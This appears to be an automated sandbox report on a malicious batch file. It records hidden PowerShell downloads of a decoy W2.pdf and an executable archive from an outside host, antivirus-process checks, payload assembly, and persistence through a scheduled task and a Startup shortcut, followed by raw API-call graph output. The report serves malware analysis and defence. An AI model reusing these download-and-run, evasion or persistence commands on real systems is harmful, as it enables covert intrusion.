                                      Preview:%PDF-1.4.%......4 0 obj.<</Linearized 1/L 393964/O 6/E 362617/N 1/T 393770/H [ 1316 238]>>.endobj. .xref..4 51..0000000016 00000 n..0000001554 00000 n..0000001614 00000 n..0000002242 00000 n..0000002407 00000 n..0000002915 00000 n..0000003346 00000 n..0000003757 00000 n..0000003803 00000 n..0000005034 00000 n..0000006941 00000 n..0000008869 00000 n..0000010482 00000 n..0000011608 00000 n..0000012618 00000 n..0000012731 00000 n..0000013728 00000 n..0000014512 00000 n..0000014563 00000 n..0000014676 00000 n..0000014801 00000 n..0000029764 00000 n..0000030031 00000 n..0000058294 00000 n..0000058547 00000 n..0000085116 00000 n..0000085374 00000 n..0000094559 00000 n..0000094824 00000 n..0000094951 00000 n..0000095014 00000 n..0000095044 00000 n..0000095120 00000 n..0000113594 00000 n..0000113891 00000 n..0000113954 00000 n..0000114069 00000 n..0000132543 00000 n..0000191838 00000 n..0000192135 00000 n..0000192913 00000 n..0000193209 00000 n..0000196912 00000 n..0000197906 0
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):55
                                      Entropy (8bit):4.306461250274409
                                      Encrypted:false
                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                      Malicious:false
                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                      File type:DOS batch file, ASCII text, with CRLF line terminators
                                      Entropy (8bit):5.198499125177484
                                      TrID:
                                        File name:9W9jJCj9EV.bat
                                        File size:498 bytes
                                        MD5:e8dfdb915a523a09e139aaa900991ddd
                                        SHA1:d23f4798c549bfb7ddd968c4c2a971f67468a662
                                        SHA256:91619737b3f7af4623dc62b4f3df7b551337ec94f693a3b9ba35bb231483393e
                                        SHA512:b4e737d1c80420688bf856df02a580b691d120307b7d31ea4766448ccd0c6eec7b2c48424691e92dffba58ca8c9a8df989f5b683d9363cac37d3dd3e5ad1623e
                                        SSDEEP:12:wmDU081kkGrAOtD0OO081kkGVX5OQ981kvYX53RP:wmD7RrAO90OxRxUkvYX53RP
                                        TLSH:C8F059370112340A8F1AC425900473807513B947C94AB4A301FE8C742DC3063CBE6EDB
                                        File Content Preview:@echo off..set url=https://myguyapp.com/msword.zip..set url2=https://myguyapp.com/W2.pdf..powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri %url2% -OutFile %USERPROFILE%\Downloads\W2.pdf"..cd %USERPROFILE%\Downloads..start W2.pdf..powershell
                                        Icon Hash:9686878b929a9886
                                        No network behavior found

                                        Click to jump to process

                                        Click to jump to process

                                        Click to dive into process behavior distribution

                                        Click to jump to process

                                        Target ID:0
                                        Start time:02:56:03
                                        Start date:05/01/2025
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\9W9jJCj9EV.bat" "
                                        Imagebase:0x7ff6ee4d0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:1
                                        Start time:02:56:03
                                        Start date:05/01/2025
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff70f010000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:3
                                        Start time:02:56:03
                                        Start date:05/01/2025
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"
                                        Imagebase:0x7ff760310000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:4
                                        Start time:02:56:08
                                        Start date:05/01/2025
                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"
                                        Imagebase:0x7ff6153b0000
                                        File size:5'641'176 bytes
                                        MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        Target ID:5
                                        Start time:02:56:08
                                        Start date:05/01/2025
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
                                        Imagebase:0x7ff760310000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:6
                                        Start time:02:56:09
                                        Start date:05/01/2025
                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                        Imagebase:0x7ff61f300000
                                        File size:3'581'912 bytes
                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        Target ID:7
                                        Start time:02:56:09
                                        Start date:05/01/2025
                                        Path:C:\Windows\System32\svchost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                        Imagebase:0x7ff77afe0000
                                        File size:55'320 bytes
                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        Target ID:8
                                        Start time:02:56:09
                                        Start date:05/01/2025
                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2116 --field-trial-handle=1716,i,17469338737042705526,11542992222865520441,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                        Imagebase:0x7ff61f300000
                                        File size:3'581'912 bytes
                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        Target ID:14
                                        Start time:02:56:22
                                        Start date:05/01/2025
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DesusertionPath C:\Users\user\AppData\Local\Temp\msword -Force"
                                        Imagebase:0x7ff760310000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:15
                                        Start time:02:56:42
                                        Start date:05/01/2025
                                        Path:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                        Wow64 process (32bit):true
                                        Commandline:msword.exe
                                        Imagebase:0x400000
                                        File size:524'295'939 bytes
                                        MD5 hash:6BCF42715FD1768FE1013C702612D0EE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Target ID:16
                                        Start time:02:56:43
                                        Start date:05/01/2025
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /c copy Market Market.cmd && Market.cmd
                                        Imagebase:0xc50000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:17
                                        Start time:02:56:43
                                        Start date:05/01/2025
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff70f010000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:18
                                        Start time:02:56:45
                                        Start date:05/01/2025
                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                        Wow64 process (32bit):true
                                        Commandline:tasklist
                                        Imagebase:0xc40000
                                        File size:79'360 bytes
                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:19
                                        Start time:02:56:45
                                        Start date:05/01/2025
                                        Path:C:\Windows\SysWOW64\findstr.exe
                                        Wow64 process (32bit):true
                                        Commandline:findstr /I "wrsa opssvc"
                                        Imagebase:0x20000
                                        File size:29'696 bytes
                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:20
                                        Start time:02:56:47
                                        Start date:05/01/2025
                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                        Wow64 process (32bit):true
                                        Commandline:tasklist
                                        Imagebase:0xc40000
                                        File size:79'360 bytes
                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:21
                                        Start time:02:56:47
                                        Start date:05/01/2025
                                        Path:C:\Windows\SysWOW64\findstr.exe
                                        Wow64 process (32bit):true
                                        Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                        Imagebase:0x20000
                                        File size:29'696 bytes
                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:22
                                        Start time:02:56:47
                                        Start date:05/01/2025
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:cmd /c md 677826
                                        Imagebase:0xc50000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:23
                                        Start time:02:56:47
                                        Start date:05/01/2025
                                        Path:C:\Windows\SysWOW64\findstr.exe
                                        Wow64 process (32bit):true
                                        Commandline:findstr /V "MechanicalDlModularRuSchedulingVisibilityProposalsClimb" Hearings
                                        Imagebase:0x20000
                                        File size:29'696 bytes
                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:24
                                        Start time:02:56:47
                                        Start date:05/01/2025
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:cmd /c copy /b ..\Charged + ..\Syndicate + ..\Controversy + ..\Fig + ..\Phentermine + ..\Peripheral + ..\Lets + ..\Usgs + ..\Viewed + ..\Dealer + ..\Matter N
                                        Imagebase:0xc50000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:25
                                        Start time:02:56:47
                                        Start date:05/01/2025
                                        Path:C:\Users\user\AppData\Local\Temp\677826\Prostores.com
                                        Wow64 process (32bit):true
                                        Commandline:Prostores.com N
                                        Imagebase:0x480000
                                        File size:947'288 bytes
                                        MD5 hash:62D09F076E6E0240548C2F837536A46A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 0%, ReversingLabs
                                        Has exited:false

                                        Target ID:26
                                        Start time:02:56:48
                                        Start date:05/01/2025
                                        Path:C:\Windows\SysWOW64\choice.exe
                                        Wow64 process (32bit):true
                                        Commandline:choice /d y /t 5
                                        Imagebase:0x6e0000
                                        File size:28'160 bytes
                                        MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:27
                                        Start time:02:56:48
                                        Start date:05/01/2025
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:cmd /c schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F
                                        Imagebase:0xc50000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:28
                                        Start time:02:56:48
                                        Start date:05/01/2025
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff70f010000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:29
                                        Start time:02:56:48
                                        Start date:05/01/2025
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F
                                        Imagebase:0x960000
                                        File size:187'904 bytes
                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:30
                                        Start time:02:56:48
                                        Start date:05/01/2025
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url" & echo URL="C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url" & exit
                                        Imagebase:0xc50000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:31
                                        Start time:02:56:48
                                        Start date:05/01/2025
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff70f010000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:32
                                        Start time:02:56:49
                                        Start date:05/01/2025
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js"
                                        Imagebase:0x7ff674960000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:33
                                        Start time:02:56:49
                                        Start date:05/01/2025
                                        Path:C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\s"
                                        Imagebase:0xb40000
                                        File size:947'288 bytes
                                        MD5 hash:62D09F076E6E0240548C2F837536A46A
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 0%, ReversingLabs
                                        Has exited:true

                                        Target ID:36
                                        Start time:02:57:01
                                        Start date:05/01/2025
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js"
                                        Imagebase:0x7ff674960000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:37
                                        Start time:02:57:01
                                        Start date:05/01/2025
                                        Path:C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\s"
                                        Imagebase:0xb40000
                                        File size:947'288 bytes
                                        MD5 hash:62D09F076E6E0240548C2F837536A46A
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:17.9%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:21%
                                          Total number of Nodes:1482
                                          Total number of Limit Nodes:28
                                          execution_graph 4166 402fc0 4167 401446 18 API calls 4166->4167 4168 402fc7 4167->4168 4169 403017 4168->4169 4170 40300a 4168->4170 4171 401a13 4168->4171 4173 406831 18 API calls 4169->4173 4172 401446 18 API calls 4170->4172 4172->4171 4173->4171 4174 4023c1 4175 40145c 18 API calls 4174->4175 4176 4023c8 4175->4176 4179 407296 4176->4179 4182 406efe CreateFileW 4179->4182 4183 406f30 4182->4183 4184 406f4a ReadFile 4182->4184 4185 4062cf 11 API calls 4183->4185 4186 4023d6 4184->4186 4189 406fb0 4184->4189 4185->4186 4187 406fc7 ReadFile lstrcpynA lstrcmpA 4187->4189 4190 40700e SetFilePointer ReadFile 4187->4190 4188 40720f CloseHandle 4188->4186 4189->4186 4189->4187 4189->4188 4191 407009 4189->4191 4190->4188 4192 4070d4 ReadFile 4190->4192 4191->4188 4193 407164 4192->4193 4193->4191 4193->4192 4194 40718b SetFilePointer GlobalAlloc ReadFile 4193->4194 4195 4071eb lstrcpynW GlobalFree 4194->4195 4196 4071cf 4194->4196 4195->4188 4196->4195 4196->4196 4197 401cc3 4198 40145c 18 API calls 4197->4198 4199 401cca lstrlenW 4198->4199 4200 4030dc 4199->4200 4201 4030e3 4200->4201 4203 405f7d wsprintfW 4200->4203 4203->4201 4204 401c46 4205 40145c 18 API calls 4204->4205 4206 401c4c 4205->4206 4207 4062cf 11 API calls 4206->4207 4208 401c59 4207->4208 4209 406cc7 81 API calls 4208->4209 4210 401c64 4209->4210 4211 403049 4212 401446 18 API calls 4211->4212 4213 403050 4212->4213 4214 406831 18 API calls 4213->4214 4215 401a13 4213->4215 4214->4215 4216 40204a 4217 401446 18 API calls 4216->4217 4218 402051 IsWindow 4217->4218 4219 4018d3 4218->4219 4220 40324c 4221 403277 4220->4221 4222 40325e SetTimer 4220->4222 4223 4032cc 4221->4223 4224 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4221->4224 4222->4221 4224->4223 4225 4022cc 4226 40145c 18 API calls 4225->4226 4227 4022d3 4226->4227 4228 406301 2 API calls 4227->4228 4229 4022d9 4228->4229 4230 4022e8 4229->4230 4234 405f7d wsprintfW 4229->4234 4233 4030e3 4230->4233 4235 405f7d wsprintfW 4230->4235 4234->4230 4235->4233 4236 4030cf 4237 40145c 18 API calls 4236->4237 4238 4030d6 4237->4238 4239 4030dc 4238->4239 4243 4063d8 GlobalAlloc lstrlenW 4238->4243 4242 4030e3 4239->4242 4270 405f7d wsprintfW 4239->4270 4244 406460 4243->4244 4245 40640e 4243->4245 4244->4239 4246 40643b GetVersionExW 4245->4246 4271 406057 CharUpperW 4245->4271 4246->4244 4247 40646a 4246->4247 4249 406490 LoadLibraryA 4247->4249 4250 406479 4247->4250 4249->4244 4252 4064ae GetProcAddress GetProcAddress GetProcAddress 4249->4252 4250->4244 4251 4065b1 GlobalFree 4250->4251 4253 4065c7 LoadLibraryA 4251->4253 4254 406709 FreeLibrary 4251->4254 4257 4064d6 4252->4257 4260 406621 4252->4260 4253->4244 4256 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4253->4256 4254->4244 4255 40667d FreeLibrary 4264 406656 4255->4264 4256->4260 4258 4064fa FreeLibrary GlobalFree 4257->4258 4257->4260 4266 406516 4257->4266 4258->4244 4259 406716 4263 40671b CloseHandle FreeLibrary 4259->4263 4260->4255 4260->4264 4261 406528 lstrcpyW OpenProcess 4262 40657b CloseHandle CharUpperW lstrcmpW 4261->4262 4261->4266 4262->4260 4262->4266 4265 406730 CloseHandle 4263->4265 4264->4259 4267 4066b1 lstrcmpW 4264->4267 4268 4066e2 CloseHandle 4264->4268 4269 406700 CloseHandle 4264->4269 4265->4263 4266->4251 4266->4261 4266->4262 4267->4264 4267->4265 4268->4264 4269->4254 4270->4242 4271->4245 4272 4044d1 4273 40450b 4272->4273 4274 40453e 4272->4274 4340 405cb0 GetDlgItemTextW 4273->4340 4276 40454b GetDlgItem GetAsyncKeyState 4274->4276 4279 4045dd 4274->4279 4280 40456a GetDlgItem 4276->4280 4286 404588 4276->4286 4277 404516 4282 406064 5 API calls 4277->4282 4278 4046c9 4338 40485f 4278->4338 4342 405cb0 GetDlgItemTextW 4278->4342 4279->4278 4289 406831 18 API calls 4279->4289 4279->4338 4281 403d6b 19 API calls 4280->4281 4283 40457d ShowWindow 4281->4283 4284 40451c 4282->4284 4283->4286 4288 403ea0 5 API calls 4284->4288 4291 4045a5 SetWindowTextW 4286->4291 4296 405d85 4 API calls 4286->4296 4287 403df6 8 API calls 4292 404873 4287->4292 4293 404521 GetDlgItem 4288->4293 4294 40465b SHBrowseForFolderW 4289->4294 4290 4046f5 4295 4067aa 18 API calls 4290->4295 4297 403d6b 19 API calls 4291->4297 4298 40452f IsDlgButtonChecked 4293->4298 4293->4338 4294->4278 4299 404673 CoTaskMemFree 4294->4299 4300 4046fb 4295->4300 4301 40459b 4296->4301 4302 4045c3 4297->4302 4298->4274 4303 40674e 3 API calls 4299->4303 4343 406035 lstrcpynW 4300->4343 4301->4291 4308 40674e 3 API calls 4301->4308 4305 403d6b 19 API calls 4302->4305 4311 404680 4303->4311 4309 4045ce 4305->4309 4306 4046b7 SetDlgItemTextW 4306->4278 4307 404712 4312 406328 3 API calls 4307->4312 4308->4291 4341 403dc4 SendMessageW 4309->4341 4311->4306 4314 406831 18 API calls 4311->4314 4322 40471a 4312->4322 4313 4045d6 4315 406328 3 API calls 4313->4315 4316 40469f lstrcmpiW 4314->4316 4315->4279 4316->4306 4319 4046b0 lstrcatW 4316->4319 4317 40475c 4344 406035 lstrcpynW 4317->4344 4319->4306 4320 404765 4321 405d85 4 API calls 4320->4321 4323 40476b GetDiskFreeSpaceW 4321->4323 4322->4317 4326 40677d 2 API calls 4322->4326 4327 4047b1 4322->4327 4325 40478f MulDiv 4323->4325 4323->4327 4325->4327 4326->4322 4328 40480e 4327->4328 4345 4043d9 4327->4345 4330 404831 4328->4330 4332 40141d 80 API calls 4328->4332 4353 403db1 KiUserCallbackDispatcher 4330->4353 4331 4047ff 4333 404810 SetDlgItemTextW 4331->4333 4334 404804 4331->4334 4332->4330 4333->4328 4336 4043d9 21 API calls 4334->4336 4336->4328 4337 40484d 4337->4338 4354 403d8d 4337->4354 4338->4287 4340->4277 4341->4313 4342->4290 4343->4307 4344->4320 4346 4043f9 4345->4346 4347 406831 18 API calls 4346->4347 4348 404439 4347->4348 4349 406831 18 API calls 4348->4349 4350 404444 4349->4350 4351 406831 18 API calls 4350->4351 4352 404454 lstrlenW wsprintfW SetDlgItemTextW 4351->4352 4352->4331 4353->4337 4355 403da0 SendMessageW 4354->4355 4356 403d9b 4354->4356 4355->4338 4356->4355 4357 401dd3 4358 401446 18 API calls 4357->4358 4359 401dda 4358->4359 4360 401446 18 API calls 4359->4360 4361 4018d3 4360->4361 4362 402e55 4363 40145c 18 API calls 4362->4363 4364 402e63 4363->4364 4365 402e79 4364->4365 4366 40145c 18 API calls 4364->4366 4367 405e5c 2 API calls 4365->4367 4366->4365 4368 402e7f 4367->4368 4392 405e7c GetFileAttributesW CreateFileW 4368->4392 4370 402e8c 4371 402f35 4370->4371 4372 402e98 GlobalAlloc 4370->4372 4375 4062cf 11 API calls 4371->4375 4373 402eb1 4372->4373 4374 402f2c CloseHandle 4372->4374 4393 403368 SetFilePointer 4373->4393 4374->4371 4377 402f45 4375->4377 4379 402f50 DeleteFileW 4377->4379 4380 402f63 4377->4380 4378 402eb7 4381 403336 ReadFile 4378->4381 4379->4380 4394 401435 4380->4394 4383 402ec0 GlobalAlloc 4381->4383 4384 402ed0 4383->4384 4385 402f04 WriteFile GlobalFree 4383->4385 4387 40337f 33 API calls 4384->4387 4386 40337f 33 API calls 4385->4386 4388 402f29 4386->4388 4391 402edd 4387->4391 4388->4374 4390 402efb GlobalFree 4390->4385 4391->4390 4392->4370 4393->4378 4395 404f9e 25 API calls 4394->4395 4396 401443 4395->4396 4397 401cd5 4398 401446 18 API calls 4397->4398 4399 401cdd 4398->4399 4400 401446 18 API calls 4399->4400 4401 401ce8 4400->4401 4402 40145c 18 API calls 4401->4402 4403 401cf1 4402->4403 4404 401d07 lstrlenW 4403->4404 4408 401d43 4403->4408 4405 401d11 4404->4405 4405->4408 4410 406035 lstrcpynW 4405->4410 4407 401d2c 4407->4408 4409 401d39 lstrlenW 4407->4409 4409->4408 4410->4407 4411 402cd7 4412 401446 18 API calls 4411->4412 4414 402c64 4412->4414 4413 402d99 4414->4411 4414->4413 4415 402d17 ReadFile 4414->4415 4415->4414 4416 402dd8 4417 402ddf 4416->4417 4418 4030e3 4416->4418 4419 402de5 FindClose 4417->4419 4419->4418 4420 401d5c 4421 40145c 18 API calls 4420->4421 4422 401d63 4421->4422 4423 40145c 18 API calls 4422->4423 4424 401d6c 4423->4424 4425 401d73 lstrcmpiW 4424->4425 4426 401d86 lstrcmpW 4424->4426 4427 401d79 4425->4427 4426->4427 4428 401c99 4426->4428 4427->4426 4427->4428 4429 4027e3 4430 4027e9 4429->4430 4431 4027f2 4430->4431 4432 402836 4430->4432 4445 401553 4431->4445 4434 40145c 18 API calls 4432->4434 4436 40283d 4434->4436 4435 4027f9 4439 40145c 18 API calls 4435->4439 4443 401a13 4435->4443 4437 4062cf 11 API calls 4436->4437 4438 40284d 4437->4438 4449 40149d RegOpenKeyExW 4438->4449 4440 40280a RegDeleteValueW 4439->4440 4442 4062cf 11 API calls 4440->4442 4444 40282a RegCloseKey 4442->4444 4444->4443 4446 401563 4445->4446 4447 40145c 18 API calls 4446->4447 4448 401589 RegOpenKeyExW 4447->4448 4448->4435 4453 4014c9 4449->4453 4457 401515 4449->4457 4450 4014ef RegEnumKeyW 4451 401501 RegCloseKey 4450->4451 4450->4453 4454 406328 3 API calls 4451->4454 4452 401526 RegCloseKey 4452->4457 4453->4450 4453->4451 4453->4452 4455 40149d 3 API calls 4453->4455 4456 401511 4454->4456 4455->4453 4456->4457 4458 401541 RegDeleteKeyW 4456->4458 4457->4443 4458->4457 4459 4040e4 4460 4040ff 4459->4460 4468 40422d 